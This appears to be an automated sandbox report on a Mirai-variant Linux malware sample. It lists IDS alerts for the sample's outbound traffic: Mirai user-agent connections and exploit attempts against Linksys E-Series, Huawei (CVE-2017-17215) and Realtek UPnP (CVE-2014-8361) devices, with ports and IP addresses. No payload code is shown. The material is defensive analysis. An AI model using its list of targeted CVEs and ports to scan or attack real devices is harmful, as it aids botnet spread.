    Timestamp:192.168.2.2395.123.96.9247868802027121 05/14/22-02:21:23.157498
    SID:2027121
    Source Port:47868
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.142.201.7333410802027121 05/14/22-02:19:59.919200
    SID:2027121
    Source Port:33410
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.250.21.933852528692027339 05/14/22-02:21:37.167899
    SID:2027339
    Source Port:33852
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23112.162.42.6537238802027121 05/14/22-02:21:05.132195
    SID:2027121
    Source Port:37238
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.65.90.20744420802027121 05/14/22-02:19:59.922507
    SID:2027121
    Source Port:44420
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.246.5550246555552027153 05/14/22-02:21:07.858957
    SID:2027153
    Source Port:50246
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.153.7557824555552027153 05/14/22-02:20:33.577012
    SID:2027153
    Source Port:57824
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.158.35.552018802027121 05/14/22-02:21:18.541626
    SID:2027121
    Source Port:52018
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.121.19447748555552027153 05/14/22-02:21:37.097695
    SID:2027153
    Source Port:47748
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.46.9249768555552027153 05/14/22-02:19:50.762314
    SID:2027153
    Source Port:49768
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.183.39.5652654802027121 05/14/22-02:20:40.567791
    SID:2027121
    Source Port:52654
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.25.133590555552027153 05/14/22-02:20:16.586055
    SID:2027153
    Source Port:33590
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.119.24644332555552027153 05/14/22-02:20:53.960011
    SID:2027153
    Source Port:44332
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.254.47.9944390528692027339 05/14/22-02:20:39.243330
    SID:2027339
    Source Port:44390
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.159.56.22951360802027121 05/14/22-02:21:27.667354
    SID:2027121
    Source Port:51360
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.255.0.22943012802027121 05/14/22-02:20:07.917097
    SID:2027121
    Source Port:43012
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.190.25152178802027121 05/14/22-02:20:20.214296
    SID:2027121
    Source Port:52178
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.245.10.4747618555552027153 05/14/22-02:20:49.434338
    SID:2027153
    Source Port:47618
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.101.250.13939170802027121 05/14/22-02:20:20.235206
    SID:2027121
    Source Port:39170
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.219.7147596802027121 05/14/22-02:20:54.835828
    SID:2027121
    Source Port:47596
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.171.5156360555552027153 05/14/22-02:20:01.321931
    SID:2027153
    Source Port:56360
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.101.175.10953748802027121 05/14/22-02:20:50.354166
    SID:2027121
    Source Port:53748
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.226.4159506802027121 05/14/22-02:20:17.686181
    SID:2027121
    Source Port:59506
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.0.4637458555552027153 05/14/22-02:19:47.505878
    SID:2027153
    Source Port:37458
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.67.25360136555552027153 05/14/22-02:20:18.646690
    SID:2027153
    Source Port:60136
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.254.111.14935796528692027339 05/14/22-02:20:16.671077
    SID:2027339
    Source Port:35796
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.227.197.13838594802027121 05/14/22-02:20:54.812324
    SID:2027121
    Source Port:38594
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.226.77.14938194528692027339 05/14/22-02:21:01.673878
    SID:2027339
    Source Port:38194
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.107.238.842926802027121 05/14/22-02:19:52.672564
    SID:2027121
    Source Port:42926
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.211.116.2738146802027121 05/14/22-02:21:00.478796
    SID:2027121
    Source Port:38146
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.197.61.8138884802027121 05/14/22-02:19:49.022506
    SID:2027121
    Source Port:38884
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.249.4833940555552027153 05/14/22-02:20:51.595958
    SID:2027153
    Source Port:33940
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.217.135.24342834802027121 05/14/22-02:20:55.988944
    SID:2027121
    Source Port:42834
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.218.19958436555552027153 05/14/22-02:21:00.626814
    SID:2027153
    Source Port:58436
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.255.82.18351098555552027153 05/14/22-02:20:05.589101
    SID:2027153
    Source Port:51098
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.100.119.6334312802027121 05/14/22-02:20:14.964785
    SID:2027121
    Source Port:34312
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.125.23157540802027121 05/14/22-02:20:07.915542
    SID:2027121
    Source Port:57540
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.159.23540704802027121 05/14/22-02:20:08.033202
    SID:2027121
    Source Port:40704
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.140.228.956792802027121 05/14/22-02:20:20.211824
    SID:2027121
    Source Port:56792
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.233.12042736555552027153 05/14/22-02:20:49.353885
    SID:2027153
    Source Port:42736
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.101.98.19232930802027121 05/14/22-02:20:39.136961
    SID:2027121
    Source Port:32930
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.221.435126802027121 05/14/22-02:21:03.799748
    SID:2027121
    Source Port:35126
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.167.25.16656372802027121 05/14/22-02:20:17.985650
    SID:2027121
    Source Port:56372
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.244.68.20160120528692027339 05/14/22-02:20:47.294814
    SID:2027339
    Source Port:60120
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.60.156.10853860802027121 05/14/22-02:21:00.524361
    SID:2027121
    Source Port:53860
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.111.225.14434616802027121 05/14/22-02:20:47.933416
    SID:2027121
    Source Port:34616
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.186.9556522802027121 05/14/22-02:20:52.533423
    SID:2027121
    Source Port:56522
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.210.63.2846488802027121 05/14/22-02:20:55.950179
    SID:2027121
    Source Port:46488
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.37.132.19058958802027121 05/14/22-02:21:20.792308
    SID:2027121
    Source Port:58958
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.234.7854962802027121 05/14/22-02:21:16.191228
    SID:2027121
    Source Port:54962
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.115.18055462555552027153 05/14/22-02:20:23.051525
    SID:2027153
    Source Port:55462
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.179.190.17858986802027121 05/14/22-02:21:16.214470
    SID:2027121
    Source Port:58986
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.76.255.19543592802027121 05/14/22-02:20:08.094888
    SID:2027121
    Source Port:43592
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.134.933166555552027153 05/14/22-02:20:29.195623
    SID:2027153
    Source Port:33166
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23112.160.255.7934852802027121 05/14/22-02:19:50.372101
    SID:2027121
    Source Port:34852
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.65.9453664802027121 05/14/22-02:21:38.570286
    SID:2027121
    Source Port:53664
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.131.48.13042684802027121 05/14/22-02:20:11.856209
    SID:2027121
    Source Port:42684
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.85.55.7252754802027121 05/14/22-02:19:54.487454
    SID:2027121
    Source Port:52754
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.35.16059362802027121 05/14/22-02:19:54.503319
    SID:2027121
    Source Port:59362
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.161.204.9052190802027121 05/14/22-02:20:44.023393
    SID:2027121
    Source Port:52190
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.182.108.1138782802027121 05/14/22-02:20:11.824320
    SID:2027121
    Source Port:38782
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23184.175.126.20139598555552027153 05/14/22-02:21:07.841944
    SID:2027153
    Source Port:39598
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.217.181.9536450802027121 05/14/22-02:19:59.875020
    SID:2027121
    Source Port:36450
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.199.11259008555552027153 05/14/22-02:19:56.454379
    SID:2027153
    Source Port:59008
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.193.3352616555552027153 05/14/22-02:20:08.849355
    SID:2027153
    Source Port:52616
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.213.235.22448522802027121 05/14/22-02:19:54.520285
    SID:2027121
    Source Port:48522
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.110.132.14254226802027121 05/14/22-02:20:17.684118
    SID:2027121
    Source Port:54226
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.216.145.7241036802027121 05/14/22-02:20:47.995662
    SID:2027121
    Source Port:41036
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.109.235052555552027153 05/14/22-02:20:37.065066
    SID:2027153
    Source Port:35052
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.166.198.559512802027121 05/14/22-02:21:03.779525
    SID:2027121
    Source Port:59512
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.31.18950858555552027153 05/14/22-02:20:49.354007
    SID:2027153
    Source Port:50858
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.241.110.2058068528692027339 05/14/22-02:20:03.905573
    SID:2027339
    Source Port:58068
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.200.1135036555552027153 05/14/22-02:20:53.942796
    SID:2027153
    Source Port:35036
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.179.441482555552027153 05/14/22-02:20:26.128794
    SID:2027153
    Source Port:41482
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.105.19149352555552027153 05/14/22-02:20:08.866235
    SID:2027153
    Source Port:49352
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.112.15449832555552027153 05/14/22-02:19:47.506025
    SID:2027153
    Source Port:49832
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.238.49.12148200528692027339 05/14/22-02:21:15.972363
    SID:2027339
    Source Port:48200
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.128.133.2537696802027121 05/14/22-02:20:54.832547
    SID:2027121
    Source Port:37696
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.181.228.22134872802027121 05/14/22-02:20:52.551576
    SID:2027121
    Source Port:34872
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.69.12146056802027121 05/14/22-02:20:36.978503
    SID:2027121
    Source Port:46056
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.95.17146834802027121 05/14/22-02:20:29.920129
    SID:2027121
    Source Port:46834
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.193.20939220802027121 05/14/22-02:21:34.953417
    SID:2027121
    Source Port:39220
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.241.97.19351608528692027339 05/14/22-02:21:15.948106
    SID:2027339
    Source Port:51608
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.205.43.21034894802027121 05/14/22-02:21:16.310408
    SID:2027121
    Source Port:34894
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.68.89.19059850802027121 05/14/22-02:20:37.007379
    SID:2027121
    Source Port:59850
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.110.15145094802027121 05/14/22-02:20:52.574667
    SID:2027121
    Source Port:45094
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.217.21441418555552027153 05/14/22-02:21:27.712807
    SID:2027153
    Source Port:41418
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.64.4550134555552027153 05/14/22-02:21:15.021175
    SID:2027153
    Source Port:50134
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.101.153.18759730802027121 05/14/22-02:21:00.437923
    SID:2027121
    Source Port:59730
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: pjT3uuMrF1Virustotal: Detection: 30%Perma Link

    Networking

    barindex
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41558 -> 172.65.10.65:55555
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58786 -> 41.79.207.121:37215
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39286 -> 172.65.218.205:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55154 -> 172.97.132.130:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51970 -> 172.65.155.62:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37458 -> 172.65.0.46:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37462 -> 172.65.234.194:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49832 -> 172.65.112.154:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38686 -> 95.211.103.152:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33210 -> 172.65.220.152:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35764 -> 95.57.137.44:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59084 -> 112.72.11.206:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52164 -> 112.179.60.106:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46484 -> 95.203.43.205:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36748 -> 95.49.216.139:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38248 -> 156.241.13.97:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47072 -> 95.159.0.238:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39484 -> 172.65.254.198:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34852 -> 112.160.255.79:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49768 -> 172.65.46.92:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43396 -> 172.245.77.54:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57792 -> 172.65.80.250:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50746 -> 172.65.197.133:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:45458 -> 172.245.211.240:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53270 -> 172.245.77.59:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:32814 -> 95.100.60.119:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42926 -> 95.107.238.8:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43922 -> 95.56.77.28:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46124 -> 95.159.60.23:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50280 -> 112.211.70.227:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47180 -> 172.65.255.113:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39132 -> 95.117.110.47:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60158 -> 95.28.223.127:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34510 -> 112.199.65.70:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53666 -> 95.159.51.29:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59008 -> 172.65.199.112:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40090 -> 172.65.203.183:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51174 -> 172.255.83.100:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53844 -> 172.65.81.179:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54454 -> 95.233.22.202:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48506 -> 95.217.237.52:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40392 -> 95.100.123.178:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35864 -> 172.65.250.69:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40842 -> 172.65.143.191:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56360 -> 172.65.171.51:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44884 -> 95.61.121.206:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47324 -> 95.31.7.65:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35938 -> 172.65.155.78:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44906 -> 95.61.121.206:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58068 -> 156.241.110.20:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33140 -> 156.247.23.149:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51098 -> 172.255.82.183:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43012 -> 95.255.0.229:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43366 -> 95.174.218.181:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58322 -> 95.56.129.32:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:32864 -> 172.65.181.244:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52616 -> 172.65.193.33:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49352 -> 172.65.105.191:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54388 -> 172.65.238.125:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60084 -> 172.255.80.6:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38782 -> 95.182.108.11:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58682 -> 95.100.32.133:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52408 -> 172.65.236.36:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49528 -> 98.159.33.194:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57492 -> 95.100.50.66:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52550 -> 95.165.141.17:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37450 -> 95.67.207.249:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58698 -> 95.100.32.133:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44762 -> 172.65.5.49:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49426 -> 172.65.130.30:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39812 -> 172.65.238.155:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47034 -> 172.65.189.87:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33590 -> 172.65.25.1:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35796 -> 156.254.111.149:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59506 -> 95.100.226.41:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42720 -> 95.101.238.33:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49508 -> 95.213.134.116:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60136 -> 172.65.67.253:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58068 -> 172.65.190.105:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38672 -> 172.65.4.72:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40510 -> 172.65.166.235:55555
